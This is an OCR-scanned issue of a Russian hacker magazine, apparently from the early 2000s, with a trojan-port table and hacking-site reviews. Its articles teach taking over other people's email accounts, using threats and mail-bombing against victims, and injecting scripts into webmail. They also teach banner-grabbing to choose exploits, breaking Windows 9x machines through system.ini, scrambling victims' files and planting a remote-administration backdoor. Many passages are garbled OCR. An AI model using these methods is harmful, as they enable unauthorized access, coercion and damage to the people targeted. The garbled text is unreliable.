пор в билетных кассах стоят роботронные 
принтеры. Ну и, конечно, эти компы здоро- 
во растащили по домам. 

Словом, если тебя дико прет от старого ба- 
рахла, то приходи в московский политехни- 
ческий музей. Там очень интересная экспо- 
зиция: компьютер, на котором запускали 
первый искусственный спутник земли; пер- 
вый компьютер, распознающий голос; ро- 
бот-манипулятор, играющий в шашки. 

Нас туда не пустили стервозные тетеньки из 
PR отдела, которые косили под дур, пытаясь 
снять с нас денег за фотосъемки, как если 6 
мы пытались сфотографировать зачатие ре- 
бенка Майкла Джексона. Поэтому мы поеха- 
ли Ha SavellaBazarra и наснимали экспона- 
тов оттуда. Надеюсь, что у ма- 
ленького музейчика нет злоб- 
ных ПР-щиков, и нас за это не 
пристрелят. 


BAM письмо 
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bl только представь: бедному админу 
| сутками приходиться сравнивать чьи- 
то имена, ники, клички собак... :) 
Само собой, и тут бывают разные обломы. К 
примеру, админ поставил патч, а номер вер- 
сии, которую мы видим, специально умень- 
wan. 


Очень просто 


Взломать почтовый ящик очень просто. Для 
этого можно использовать: лом, гвоздодер, 
молоток, голову друга и другие подручные 
средства. Если ты решил захватить здание 
почты, то без серьезной военной техники те- 
бе уже не обойтись! Ой, мне тут подсказы- 
вают, что взлом почты - это малость другое. 
Ладно, не пугайся, я не буду рассказывать о 
том, как сломать почтовый ящик у тебя в 
подъезде, это слишком пошло. Вместо этого 
мы с тобой поговорим о различных способах 
доставания пароля от электронной почты. 
Все, что я напишу ниже, является бредом 
моего больного воображения, и тебе не стоит 
это считать руководством к действию. 


Человеческий способ 


Он заключается в том, чтобы попросить у че- 
ловека пароль от его почтового ящика. Ты бу- 
дешь смеяться, но я знаю пароли от ящиков, 
по меньшей мере, пяти человек. Причем они 
все сказали их мне абсолютно добровольно. 
Главное вовремя попросить! К примеру, нас- 
тупили каникулы, чел уезжает бухать за го- 
род на неделю. И тут облом: размер ящика 
(на тай.ги) ограничен всего двумя мегами! А 
ты предлагаешь свои скромные услуги по за- 
бору почты. Естественно, перед этим жела- 
тельно втереться в доверие, :) Учти - многие 
не заморачиваются с придумыванием новых 
паролей, и используют один и тоже пароль 
для всего. Это очень хорошо. Если человек не 
доверит тебе свой почтовый ящик, ты можешь 
узнать у него пароль от чего-нибудь другого. 
Тут главное - найти подход к человеку. Не на- 
до лезть к нему в асю, и кричать: “а ну давай 


a ape yi 
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пароль! а то всэх napaxy!”. Такое не катит. 
Ну, я надеюсь, ты меня понял. :) Еще очень 
часто люди делают имя пользователя и па- 
роль одинаковыми. Я слышу, как ты кричишь, 
что это бред? Ни фига! Очень многие (янки, 
особенно) делают именно так. 


Античеловеческий способ 


Существует также противоположный преды- 
дущему способ. Тут уже основной упор де- 
лается не на хорошие отношения с челове- 
ком, а на плохие. :) То есть, ты лезешь к че- 
ловеку в асю, и кричишь: “давай сюда па- 
роль, а то сейчас братва приедет и всэх 
парэжэт”. Тебя, конечно, пошлют туда, где 
еще не ступала нога хакера, но это ничего - 
мы ещё этому засранцу покажем, где раком 
зимуют. Для начала ты можешь подписать его 
на все рассылки Subscribe.ru. Пусть почитает 
- глядишь, и поумнеет. :) Имхо, ему должно 
надоесть каждый день выкачивать по нес- 
колько мегов почты. Поэтому от рассылок он 
отпишется. Сразу он не сдастся - ты не пред- 
ставляешь, какие сейчас ламаки твердолобые 
пошли, хоть орехи (под пиво) об них коли! 


В page eet es, 
ee. esas debe. dadeet 
aoe 


Продолжим. Теперь ты можешь просто ба- 
нально заспамить ящик всяким хламом. О 
том, как написать скрипт, который рассылает 
почту, Х уже не раз писал. Теперь все зави- 
сит только от терпения жертвы и твоей нас- 
тойчивости. Если ты лично знаешь жертву 
(решил напакостить любимой учительнице), 
воспользуйся подручными средствами: утюг, 
паяльная лампа, обрез... 

Не лучший, но на удивление эффективный 
способ. 


Веб-интерфейс 


Сейчас большинство почтовых серверов 
имеют такую функцию, как меБ-интрефейс. 
Безусловно, это очень полезная фича. Но по- 
лезна она только для очень малого числа на- 
роду, для большинства же это несколько 
лишних возможностей дать почитать свою 
почту другим людям. 

К каким проблемам это ведет? Прежде всего, 
это куча дыр связанных с использованием 
скриптов, вставленных в письмо, которые 
просто меняют пароль на ящике. Причем, ес- 
ли юзер отключит скрипты в своем браузере, 
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OH не сможет работать с некоторыми ящиками 
через веб-интерфейс (beep.ru, yandex.ru). 

Многие почтовые системы научились выре- 
зать из письма теги, повышая безопасность 
работы с почтой. Но не все так просто! IE 
(про НетШкаф 6 и Оперу ничего не могу 


сказать), к примеру, умеет вставлять в 
письмо файлы CSS, которые находятся на 
другом сервере. А что тебе мешает вставить 
скрипт CSS в файл, а не в письмо? Правиль- 
но - ничего! Главное - не бояться экспери- 
ментировать (это можно сделать и на своем 
ящике). Теперь о том, что должен делать 
скрипт. Он может отправлять заранее за- 
полненную форму смены пароля, а может 
перенаправлять пользователя на заранее 
сделанную страничку, на которой ему надо 
будет ввести свой логин и пароль. Естес- 
твенно, эти данные, должны каким-нибудь 


образом оказаться у тебя. Если ты смог пе- 
ренаправить пользователя, то все остальное 
дело техники. :) 

Частично избавиться от этой напасти можно, 
используя браузер, отличный от ТЕ. А лучше 
всего, конечно, качать почту почтовой прог- 
раммой (АутГлюкЭкспресс или ЗеБат), и спо- 
койно читать ее у себя на винте. Про дырки в 
веб-интефейсах было написано очень много, 
но их все продолжают и продолжают нахо- 
дить. Имей в виду! 


Забыл пароль! 


Еще один недостаток веб-интерфейсов - это 
наличие возможности вспомнить пароль, не 
уходя с сайта. Когда человек регистрируется, 
он выбирает себе вопрос и ответ, и если из 
его дырявой башки вылетает пароль, то он 


BAM ПИСЬМО 


называет ответ, и добрый почтовый сервис 
ему все напоминает. Очень часто встречают- 
ся вопросы типа: “Мой poct?”, “Девичья фа- 
милия моей матери?” и т.д. Если пользовате- 
лей четко отвечает на заданный вопрос (“Ваш 
год рождения?"), а не пишет чушь (“Меня 30- 
вут Чебурашка"), то вероятность, что ты уз- 
наешь ответ, равна 99%. Но это еще не все! 
Иногда, для напоминания пароля, надо прос- 
то ввести ту же информацию, что пользова- 
тель вводил при регистрации. Очень часто 
админ, который отвечает за напоминание па- 
ролей, просто забивает на сравнение данных, 
и высылает пароль. Ты только представь: 
бедному админу сутками приходиться сравни- 
вать чьи-то имена, ники, клички собак... :) 


Эксплоиты 


Всем известно, что в любом софте бывают 
дыры. И в почтовом тоже. Некоторые почто- 
вые системы подвержены банальному пере- 
полнению буфера. Смысл вышесказанного 
сводится к тому, что тебе надо узнать какой 
софт стоит на почтовом сервере, найти 
эксплоит к нему, и... Дело в шляпе. Естес- 
твенно, если админ не лох, он оперативно 
будет заделывать все дыры. Для того, чтобы 
узнать версию софта, тебе нужно соеди- 
ниться telnet’om со 110м портом почтового 
сервера. Если ты сидишь не в винде (а ты 
должен сидеть не в винде, иначе как ты со- 
бираешься компилить эксплоит?), то коман- 
да будет выглядеть примерно так: 

$ telnet ххххх.ги 110 

Телнет соединяется с сервером, и выдает те- 
бе название и версию почтового софта: 

+OK хххххх.ги Cyrus POP3 v2.0.9 server ready 
Теперь осталось найти и откомпилировать 
эксплоит, и получить права рута на почтовом 
сервере. :) 

Само собой, и тут бывают разные обломы. К 
примеру, админ поставил патч, а номер вер- 
сии, которую мы видим, специально умень- 
wun. 


Bruteforce 


На мой взгляд, один из самых неэффективных 
способов взлома. Тут все сводится к простому 
перебору букв и цифр, которые подставляют- 
ся в поле пароля - вдруг подойдет? Иногда 
бывает - везет, но чаще всего появляется ро- 
зовая птица обломинго. Существуют спе- 
циальные программы, которые соединяются с 
ящиком по 110 порту и пытаются подобрать 
пароль. 


Dictionary 


Для того чтобы не просто бездумно переби- 
рать пароли, люди придумали создать сло- 
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варь паролей. Это текстовый файл, в KOTO- 
ром на каждой строчки записано по одному 
паролю. В нем собираются наиболее часто 
используемые пароли. Для работы со сло- 
варями также существует специальный 
софт. 

Словари можно найти в сети. Я где-то видел 
словарь с английскими паролями на 27 мет- 
ров и с русскими на 11. 

Метод гораздо более эффективный, чем 
простой bruteforce. Но, скажу тебе по сек- 
рету, я проверял по словарям все свои па- 
роли - и не нашел ни одного. :) 


Куки и сессии 


А знаешь ли ты, что многие пользователи, 
завершая работу с тем же mail.ru, He нажи- 
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мают на кнопочку “Выход”, а просто закры- 
вают окно браузера? При этом, имея доступ 
к компьютеру, с которого человек только 
что проверял почту, ты можешь попасть в 
его ящик, набрав нечто вроде: 

http://www. xxxxx.ru/cgi-bin/start/username 
Это потому, что сервер запоминает ip-agpec 
компьютера, и потом встречает его, как 
родного. :) 

Работоспособность этого метода зависит от 
настроек браузера и установок почтового 
сервиса. 


Трояны 


Тут говорить вообще не о чем, сто раз уже 
обсуждали. Засылаешь трояна, и ждешь па- 
роли. :) 


Переполнение буфера в 
софте 


Кроме эксплоит, на почтовом сервере есть 
возможность сотворить переполнение бу- 
фера у пользователя в почтовой программе. 
Конечно, пароли ты не получишь, но напа- 
костить можно сильно. Опять же, тебе при- 
дется узнать версию программы, и найти к 
ней описание эксплоита. 


Руками не трогай 


CepeguHa 5О-ых 


Наступило время, когда компы начали использовать не только в тех заве- 
дениях, где их строили и изучали, но и в некоторых доселе не видевших 
этого чуда местах: в основном, в областях, связанных с научными разра- 
ботками, в области космических исследований, а также в вычислительных 
центрах. В связи с тем, что кто-то должен был обслуживать ЭТИ КОМПЫ, 
программеры начали потихоньку выползать из своих исследовательских 
центров и лабораторий на глаза обычным людям. Не удивительно, что 
именно их начали повсеместно называть компьютерщиками. На долю же 
инженеров выпало изучение и совершенствование машин. Они начали 
прокладывать самые первые экспериментальные сети в своих учрежде- 
ниях. Компы заметно уменьшились в размере. Хакеров все еще не было. 


Вот и все, а ты боялась, только юбочка по- 
мялась. :) Слушай, а зачем тебе чужой поч- 
товый ящик? Если уж такие дела - заведи 
свой собственный, и всё :). 

Удачи! fi 
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СТАНДАРТНЫЕ 


троянские 


Имя трояна: 
Satanz Backdoor 
Silencer 

WebEx 

Doly Trojan 
Psyber Stream Server 
Ultors Trojan 
VooDoo Doll 
FTP99CMP 
Shivka-Burka 
SpySender 
Shockrave 
BackDoor 

Trojan Cow 
Ripper 

Bugs 

Deep Throat 

The Invasor 
Phineas Phucker 
Masters Paradise 
Portal of Doom 
WinCrash 
ICQTrojan 
Sockets de Troie 
Sockets de Troie 1.x 
Firehotcker 
Blade Runner 
Blade Runner 1.x 
Blade Runner 2.x 
Robo-Hack 
DeepThroat 
DeepThroat 
GateCrasher 
Priority 

Remote Grab 
NetMonitor 
NetMonitor 1.x 
NetMonitor 2.x 


NetMonitor 3.x 
NetMonitor 4.x 
ICKiller 

Portal of Doom 
Portal of Doom 1.x 
Portal of Doom 2.x 
Portal of Doom 3.x 
Portal of Doom 4.x 
Portal of Doom 5.x 
iNi-Killer 

Senna Spy 
Progenic Trojan 
Hack?99 KeyLogger 
GabanBus 

NetBus 
Whack-a-mole 
Whack-a-mole 1.x 
Priority 

Millennium 

NetBus 2 Pro 
GirlFriend 

Prosiak 

Prosiak 

Evil FTP 

Ugly FTP 

Delta 

Back Orifice 

Back Orifice 
DeepBO 

NetSpy DK 
BOWhack 

BigGluck 

The Spy 

Masters Paradise 
Masters Paradise 1.x 
Masters Paradise 2.x 
Masters Paradise 3.x 
Sockets de Troie 


17307 

17308 

17789 

19872 

19873 

19874 

19875 

10067 
[10167 
19989 

11000 
[11223 
[12223 
[1245 

[1245 

[12361 
[12362 
16969 
120001 
120034 
121544 
122222 
133333 
123456 
123456 
126274 
131337 
131338 
131338 
131339 
131666 
34324 
140412 
140421 
140422 
140423 
140426 
150505 


Fore 

Remote Windows Shutdown 
Telecommando 
Devil 

The thing 

NetBus 1.x 
NetBus Pro 
SubSeven 
NetSphere 
Silencer 

Millenium 

Devil 1.03 
NetMonitor 
Streaming Audio Trojan 
Socket23 
Gatecrasher 
Telecommando 
Gjamer 

IcqTrojen 

Priotrity 

Vodoo 

Wincrash 
Wincrash2 

Netspy 
ShockRave 
Stealth Spy 

Pass Ripper 
Attack FTP 
GirlFriend 

Fore, Schwindler 
Tiny Telnet Server 
Kuang 

Senna Spy Trojans 
WhackJob 

PhaseO 
BladeRunner 
IcqTrojan 

InIkiller 


150766 
153001 
161466 
165000 
16400 
12346 
120034 
11243 
130100 
11001 
120000 
165000 
17306 
11170 
130303 
|6969 
161466 
112076 
|4950 
16969 
|1245 
15742 
[2583 
1033 
1981 
|555 
12023 
|666 
121554 
150766 
134324 
130999 
111000 
123456 
|555 
[5400 
|4950 
19989 


лошШяоь 


PortalOfDoom 
ProgenicTrojan 

Prosiak 0.47 
RemoteWindowsShutdown 
RoboHack 

Silencer 

Striker 

TheSpy 

TrojanCow 

UglyFtp 

WebEx 

Backdoor 

Phineas 

Psyber Streaming Server 
Indoctrination 

Hackers Paradise 

Doly Trojan 

FTP99CMP 

Shiva Burka 

Remote Windows Shutdown 
BigGluck 

NetSpy DK 

Hack?99 KeyLogger 
iNi-Killer 

ICQKiller 

Portal of Doom 
Firehotcker 

Master Paradise 

BO jammerkillahV 


порты 


9872 
111223 
22222 
53001 
[5569 
1001 
2565 
40412 
2001 
23456 
11001 
1999 
12801 
1509 
6939 
|456 
1011 
11492 
1600 
53001 
34324 
31339 
112223 
[9989 
7789 
9875 
5321 
40423 
121 


HACKER INSIDE, 
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7. 


Велком Инсайд 


Байтики, нолики. Вот здесь 
немного подправляем, BOT 
здесь немного добавляем и 
немного обрезаем. И вот 
они, заветные два слова и 
один предлог: “ВЫ В СИСТЕ- 
МЕ”. Теперь быстро опреде- 
ляемся, что делать. Может 
оставить где-нибудь 
надпись: “Свободу Ке- 
вину Митнику”? Ho 
его уже освободи- 
ли. А может все- 
таки оставить? 
Нет, с такими 
приколами 
только на 
www.det- 


ys 
4 


Например, ты мо- 
жешь переименовать 
tetris.exe в 
word.exe, а word.exe 
в tetris.exe. С перво- 
го взгляда ламер бу- 
дет мучить иконки и 
материть линки. 
Возможно, через 
неделю до него 
дойдет, что прои- 
зошло. Но за это 
время ты получишь 
порцию смеха, как 
от просмотра засе- 
дания Государствен- 
ной Думы. 


skiy-sad.ru. А может удалить все файлы? 
Тогда придется иметь дело с милицией. Нет, 
она не будет тебя искать. Она будет искать 
человека, который тебя застрелил. 


И все же... 


Когда ты пробираешься через сеть на ком- 
пьютер соседа или начальника по работе, ты 
должен оставить достойный след своего при- 
сутствия. Проделав тяжелый труд хака, нель- 
зя опозориться детскими шалостями. Нужно 
стоящее доказательство твоего присутствия, 
ия тебе помогу в этом. 

В большинстве случаев в локалке или у нера- 
дивых юзверей в нете стоят компьютеры под 
9х, поэтому все мои рекомендации будут ис- 
ХОДИТЬ ИЗ ЭТОГО. 


ки... 


Первое, что я хочу тебе посоветовать, это 
создать кучу файлов и засунуть их на ком- 
пьютер жертвы. Файлы могут быть пустыми, 
это не главное. Ты думаешь, что это прими- 
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тивно? А если им дать интересные имена, 
типа: 

1. Хочешь иметь круглые глаза? Выпей три 
литра слабительного!!! 

2. Хочешь узнать, кто такой ЛОХ? Сбегай за 
пивом, ая тебе расскажу!!! 

Это только примеры. Ты и сам можешь по- 
шевелить мозгами - уверен, в них что-то 
еще осталось кроме пива. 

После этого засунь эти файлы (можно пап- 
ки) на компьютер жертвы в папку c:\win- 
домз\Рабочий стол. Все это проявится на 
рабочем столе твоего друга или недруга, 
ну, в общем, ламера. Прикольно наблюдать 
за челом, у которого на экране появляются 
файлы (можно папки) с такими именами. 


Обидно, что на компьютере жертвы очень 
трудно получить доступ к реестру Win 9х. Не 
стоит расстраиваться, в этой системке еще 
остались старые файлы system.ini и win.ini. 
Большой Билли навешал лапши, что эти фай- 
лы не используются системой и сохранились 
только для совместимости со старыми прога- 
ми. Армянское радио сообщает, что это лапша 
фирмы “Гонобобель унд Ко". 

Заходи в папку Windows и ищи там файл sys- 
tem.ini. Открой его. Перед тобой появится 
нечто подобное: 


[boot] 
oemfonts.fon=vgaoem.fon 
system.drv=system.drv 
drivers=mmsystem.dll power.drv 
shell=Explorer.exe 


Нас интересует последняя строка в моей вы- 
резке, Она означает, какая прога будет выс- 
тупать в качестве шелла для окон. Если ве- 
рить Билли, то изменение этого файла не пов- 
лияет на работу виндов. Проверяй. Изменяем 
эту строку Ha shell=notepad.exe. После пере- 
загрузки на компьютере жертвы появятся 
пустые обои (без иконок и панели с кнопкой 
“Пуск”) и запустится только notepad. Больше 
ничего запустить с такой системы нельзя. Ну 
как, дядя Билли? Только что мы превратили 
машину Wintel в печатную машинку. Я думаю, 


любая жертва будет довольна твоей сообра- 
зительностью. А главное, что больше этот 
комп никогда не зависнет :). 


Косметический ремонт 


Мы немного побаловались, теперь надо 
приукрасить компьютер жертвы. Для этого 
можно воспользоваться уже всем известными 


www.lamerru. Такие приколы прохиляют 
только в старшей группе младших ясель или, 
в крайнем случае, у пионеров начальных 
классов. Моя пятимесячная дочь и то более 
прикольные вещи выкидывает, а жена потом 
их стирает :). Только не кнопкой Delete, а 
ручками в стиральной машине :). 

Если хочешь действительно позабавиться, то 
файлы нужно не удалять, а переименовывать. 
Например, ты можешь переименовать 
tetris.exe в word.exe, а word.exe в tetris.exe. С 
первого взгляда ламер будет мучить иконки и 
материть линки. Возможно, через неделю до 
него дойдет, что произошло. Но за это время 
ты получишь порцию смеха, как от просмотра 
заседания Государственной Думы. 

Вторым этапом можешь зайти в папку “Мои 
документы” (ламеры там хранят свои записи) 
и переименовать все файлы в 1.doc, 2.doc, 
3.doc и так до посинения. Немного примитив- 
но, но интересней, чем удалять инфу. 


методами. Можно изменить logo.sys (логотип 
загрузки компьютера), logos.sys (логотип от- 
ключения питания), logow.sys (логотип завер- 
шения работы). 

Можно залезть в директорию Web, которая 
валяется в папке Windows. Там находятся 
файлы, которые отвечают за дизайн провод- 
ника при путешествии по папкам. Особенно 
интересны файлы Mycomp.htt, recycle.htt и 
default.htt. С их внутренностями можно легко 
разобраться без скальпеля =). Кишки этих 
файлов выполнены в виде Вет!-команд. Обя- 
зательно подредактируй файл wvleft.bmp. Это 
любимое М$-небо, которое показывается во 
всех папках, где выбран режим “Отображать 
в стиле WEB". Корпорация Мракософт до сих 
пор летает в небесах, и пора их опустить на 
землю, а лучше в шахту к шахтерам. Если ты 
этих файлов не нашел, то попробуй стереть 
пыль с экрана, потому что файлы скрытые. 


Помнится, был такой фильм, в котором сни- 
мался американский шпеньдик - Арнольд. Он 
очень любил все стирать. Вот так и у тебя, на- 
верно, чешутся руки стереть что-нибудь. Ес- 
ли я прав, то ты самый настоящий 


Напоследок простой рецепт - правда, спра- 
ведливый (как правило) только для локаль- 
ных сетей, Если ты смог добраться на пару се- 
кунд до клавы компьютера жертвы, то я тебе 
советую сделать следующее: 


1. Войти в “Панель управления". 

2. Щелкнуть по пимпе “Пароли”. 

3. Войти в закладку “Удаленное управление". 
4. Здесь выделяем “Разрешить удаленное уп- 
равление этим сервером” (с каких это пор Win 
9x - сервер?). 

5. Теперь нужно только задать пароль и на- 
жать “ОК”. 


Зачем это нужно: теперь ты можешь по ло- 
калке получить полный доступ к этому ком- 
пу. Надо только ввести пароль. Многочис- 
ленные наблюдения показали, что после 
моих приколов ламеры первым делом про- 
веряют доступность дисков и закрывают их. 
А про “удаленное управление этим серве- 
pom” забывают. 

Вот такие пироги. Удачных тебе 
атак и веселых развлечений на 
ламерских тачках! 
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по хакч. 


MOOF (MOOF@XAKEP.RU; HTTP://MOOF.DA.RU) 


TO ж: если ты читаешь эти строки - 
Lj значит, ты смог оторвать свой пушис- 
тый задик от мягкого компьютерного 
кресла и дойти до ближайшего места продажи 
Х. Растолкав толпы фанатов, ты купил, нако- 
нец, этот спец. 
Конечно, ты интересуешься всякими там ха- 
ками-кряками и не прочь узнать побольше 
полезной информации. Для этого не надо по- 
купать заумных книжек и журналов! Мы по- 
можем тебе найти всю необходимую инфу в 
глобальной помойке ака Интернет. Не удив- 
ляйся, энное число сайтов данного обзора 
идет на неродном языке Васи Пупкина. К со- 
жалению, хорошие сайты на русском языке 
можно пересчитать по пальцам, чем мы с TO- 
бой чуть ниже и займемся. 
Обозревать www.xakep.ru я не буду просто по- 
тому, что это надо видеть своими глазами :). 


Ладно, хватит болтовни! Перейдем ближе к 
телу. 


www.void.ru 
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Если ты не знаешь этот сайт, то, по всей ви- 
димости, последние несколько лет ты был 
слепым, глухим и склонным к алкоголизму 
капитаном дальнего плаванья. :) void.ru - 
популярнейший русскоязычный ресурс, 
авторы которого занимаются выпуском кр 
ких новостей и “производит исследования в 
области компьютерной безопасности для 
собственного удовольствия”. 

На сайте всего очень много и все очень ин- 
тересно. Первое, что хочется сделать зайдя 
на сайт - это прочесть все новости о 
разнообразных взломах, дырках, 
патчах и т.д. Новостей много, и все 
они заслуживают твоего внимания. 
Кроме обычных новостей, ты можешь 
посмотреть список взломанных за 
последнее время серверов - может, 
среди них твой? :) Кроме этого, если 
ты сам сломал какой-нибудь сайт, то 
можешь сообщить об этом и твой подвиг 
сразу окажется в списке! Если тебя ломает 
ходить каждый день на сайт и следить за но- 
винками, подпишись на e-mail рассылку. 


Очень 


Af ie vi FILE 


удоб- 

ная шту- 

ка. 

Как и лю- 

бой уважаю- 
щий себя сайт, 
уо!4.ги имеет 
раздел статей. 


Что это - думаю, объяснять особо не стоит. 
Статей не очень много, но зато все они 
чрезвычайно познавательные. Обязательно 
загляни в этот раздел, и ты, наверняка, 
найдешь что-то полезное для себя (звучит, 
как реклама зоомагазина :)). Прочитав па- 
ру-тройку статей, ты сможешь узнать о 
различных способах взлома вебсерверов, 
ICQ ит.д. 


Mf 
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Кроме написания статей и новостей, ребята с 
void.ru пишут полезные программы. Полезные 
не для всех, а для нас с тобой. Ты же слышал 
о таком сканере портов, как VoidEye? Нет?! 
Очень жаль, тогда тебе непременно надо посе- 
тить Void.ru и посмотреть все самому, так как 
для описания VoidEye нужна еще одна статья, 


которая, собственно, там есть Ha void. ru. 
Создатели сайта не забыли об одной из са- 
мых важных вещей на популярном ресурсе - 
о форуме. Форум - это то, что надо, когда 
тебе нужна какая либо помощь, или просто 
хочется пообщаться. 

Из маленьких, но не менее важных фишек 


ВСЯ СЕТЬ 


присутствующих на сайте следует отметить 
наличие поиска. Он заметно облегчает =). 
Что ты подумал? Да-да-да, облегчает поиск 
информации. Еще на сайте есть специальная 
форма с помощью которой ты можешь прове- 
рить свой прокси-сервер на анонимность, или 
посмотреть информацию о сервере располо- 
женном в зоне “.ги”. Кроме этого, сайт сущес- 
твует на двух языках: русском и английском. 


Итого: Вот вроде и все, что можно сказать по 
поводу сайта. Без сомнения, тебе стоит его по- 
сетить! Сайт заслуживает твердую пятерку. 


void.cyberpunk.ru:8101 


Если о сайте void.ru знают многие, TO о TOM, 
что у сайта есть файловый архив знают го- 
раздо меньшее количество народу. Так вот: 
void.cyberpunk.ru - это файловый архив, но 
не простой, а с программами и утилитами для 
различных областей взлома. 

Что есть на сайте из софта: всевозможные 
сканеры (как для Виндов, так и для Юнихов), 
взломщики паролей, утилиты для ТСО, троя- 
ны, Нех-эдиторы, дисассемблеры, снифферы, 
эксплоиты (опять для нескольких платформ), 
словари, куча исходников и интересных ста- 
тей и текстов. 


vrs as see 
уроки yannfopans wink, WT, *nie 


Tra рот сы ko hin oats, disiasinn & mone 


ili atti 


cee crap sano sp 


ИЯ] Ai 


Panini словари 


р Wo salt ies il It 


Oxeerune eases scat 


па ан 


hi th!|\|\ _: 


6A. 1o 


0000 POO пани NERD TED Po SUD UNE Нины паининииныю TO 


Качать файлы отсюда гораздо безопаснее, 
чем со странички Васи Пупкина, размещен- 
ной на народе. Можно быть уверенным, что 
файлы не заражены. 


Итого: отличный самодостаточный файловый 
архив. Можно найти самый необходимый софт 
для различных ОС. 
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где люди пишут о всяких багах в фильмах. 
К примеру, когда герои супер-боевика ло- 
мают пароль, нажав два раза на shift. Hy и 
все в таком духе. 

Навигация сайта очень неудобная, и сильно 
раздражает. Поэтому найти тут что-то очень 
сложно, хотя форма поиска присутствует. 
Увы, он не сильно упрощает задачу. 
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www.hackzone.ru 


Если ты что-то He нашел на hackzone.ru, то 
это значит, что ты плохо искал. На этом 
сайте есть все, ну или практически все 
необходимое для обучения и развития в се- 
бе хакера. :) 

Начинается сайт, естественно, с новостей. 
Новости появляются тут достаточно регу- 
лярно и все их можно получать по почте 
(есть возможность подписаться на несколь- 
ко разных рассылок). 

Но новости - это не главное. Раздел статей 
занимает на сайте одно из ключевых мест. 
Различных материалов по взлому и защите 
достаточно много. Почитать их стоит, если 
не все, то хотя бы часть из них. Тут же ес- 
ть и конкурс статей. 

Полезно заглянуть в раздел обзоров. Там 
собрано море различной информации. И 
один из самых полезных обзоров - это 
BugTraq. В нем можно найти самую свежую 
информацию о только что открытых дырках 
в программном обеспечение. Информация 
очень ценная как для админов, так и для 
хакеров. Ведь если нерадивый админ вов- 
ремя не залатает дырку, то шустрый хакер, 
начитавшись ВидТгад’а тут же чего- нибудь 
испортит. :) Кроме этого, рекомендую почи- 
тать “Бред сивой кобылы". Это такая штука, 
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Но самое интересное, что есть на сайте - это 
форум. Читать его одно удовольствие! Если 
ты, конечно, умеешь читать. :) Обязательно 
загляни туда. 

Кроме этого, если ты проводишь много вре- 
мени в инете, можешь принять участие в 
соревновании по взлому 64-битного ключа 
RC5. Есть такой проект в инете (distrib- 
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HO. :) Подробнее можно узнать по адресу: 
http://www.hackzone.ru/rc5/. 


Итого: Отличный, информативный сайт о 
взломах и защите от них, с регулярно об- 
новляющейся и дополняющийся информа- 
цией. Одно убивает - дизайн. Хотя, может 
тебе он и понравится?! 
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Раепростренение Motor материала без носаго ведома ЗАПРЕЩЕНО 


+ Sendmail: МЕЧТА АНОНИМАЙЗЕРА, СПАМЕРА, ШПИОНА. 
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www.secure.f2s.com 


Неплохой как по информативности, так и по 
исполнению сайт. На первой странице, естес- 
твенно, новости. Судя по всему, сайт открыл- 
ся не очень давно, так как некоторые разде- 
лы не доделаны до конца, но объем его впол- 
не приемлем. В разделе “texts” собранно не- 
которое количество интересных и полезных 
статей по взлому. Материалы, конечно, не 
слишком оригинальны, но зато собраны все в 
одном месте, а не разбросаны по ста разным 
серверам. 

Кроме статей, следует обратить внимание на 
раздел “bugs”, в котором собраны различные 
дырки в бесплатных скриптах и софте. Список 
этот напоминает аналогичный список с 
void.ru. :) 

Еще тут есть эксплоиты и файловый архив. В 
которые тоже стоит ненадолго заглянуть. 
Итого: средненький сайт посвященный взло- 
му. Описан только для того, чтобы показать, 
как выглядит половина русскоязычных сайтов 
о хаке. Остальные и того хуже. 


www,.sec.ru 


Рассказывая про сайты о хаке, взломе, нельзя 
не упомянуть о сайте, посвященном защите 
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информации. WWW.SEC.ru - один из крупней- 
ших серверов по этой теме. Рассказывать обо 
всем, что есть там просто не имеет смысла - 
надо просто зайти и самому посмотреть. Меж- 
ду прочим, сайт посвящен не только компью- 


терной инфе - там и о сексе есть кое-что :). 


Итого: сайт, посвященный безопасности во 
всех ее проявлениях. Правда, тут ты не най- 
дешь ни одного хака. 
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феры...), различные статьи, библиотека. 
Из интересных on-line вещей наличие ска- 
Hepa Cgi-AbIPOK и накручивальщика счетчи- 


ПО | Kos, 


шв шин 


Итого: хороший, сильный сайт, на который 
стоит обратить свое внимание. 


geocities.com/wolandk/ 


Этот сайт представляет собой просто огром- 
ное хранилище текстовых файлов. Различ- 
ных статей и книг, посвященных взлому и 
хаку, тут просто тонна. Все они хранятся в 
архивах, и легко и удобно скачиваются. 
Всего есть несколько разделов: Security, 
Virii & Cracking, Технологии Internet, 
Phreaking и еще что-то. Полезного материа- 
ла много и ты обязательно найдешь тут что- 
нибудь интересное для себя. 


Итого: прежде всего зайди сюда и запасись 
Oi et литературой. 


www.nitrogear.org 


Сайт одноименной хакерской группы. Kpo- 
ме ее релизов, тут можно найти много по- 
лезной и важной информации для себя. 
При большом желании можешь подписать- 
ся на е-тай рассылку новостей. Здесь есть 
мета- поисковик по ипдегдгоипа’ным сай- 
там. И такая фишка, как OS detector. Ты 
пишешь адрес сайта, а она показывает 
версию и тип web-cepBepa, а так же тип 
оС. 

Но самое важное, что тут есть - это файло- 
вый архив. В нем находится и документа- 
ция, и эксплоиты, и всяческие backdoor'bl, 
rootkit’bl и снифферы. Кроме того, тут мож- 
но и пообщаться: на сайте есть форум. По 
заверениям авторов сайта все это сделано Е Be Bao a 
для нашего с тобой удобства. Поверим? :) 


Security/E1f ‚Нее 
Итого: приятный во всех отношениях сайт, Призрааны Consent, Cee coed В НИРС, bee, Cte eee ce tee eee eae Gere 
a [cee ее A, OG, Bee lee Pee eee, eed eee oe 
Особенно понравился его дизайн. И кон- —— Beek Ceres | [Crean Fie | Cogn Th ae, | ee ee i ey fi 
тент тоже ничего. Рак | ивы | 
: pester Pit Otome Г Сайты pete Г Робиту 
. р ide Snag cet Сы 
www.securityelf.net . ' y . 
ое tae а er? Tee Be os 
а S BR м тии 
Своеобразный портал, посвященный взло- a i Fa ad es gaa es py lee had 
Foon rear PO ELS a ee es are Cpe титры Е 
му. Имеет как каталог ссылок, так и поиско- Бри me a ge ар. pond ды Орлы СРО В Ой ева в в. 
ТЫ 
вую систему (которая, ко всему прочему, ceo@egar rene khan isan ‘eye bid pare TE, О bee дн 


ищет и всякие краки). Очень удобно, если палки LoS ho igh a a аб 


надо что-то найти. Категорий много, и всё в Е UPR er] 1D ESP | 7 ee | 
целом достаточно толково. 


7 7 ориентир riers 
Еще есть эксплоиты для целой кучи Осей литые a БЫ иже РТ eed ied mail dee Ровер бот, Гойя 
i F Crores TR Beret 0 cern, A a ee CT № 
(для Windows NT, Windows 98, Windows 95, " совы leper сына 


Е Пе ИО 


ICQ, Red Hat Linux, FreeBSD, Solaris, Novell 


Netware, Irix...), программы (сканеры nop- ™ м - ‘ — 

= 7 fuses Bee ee ete ears bere pe 
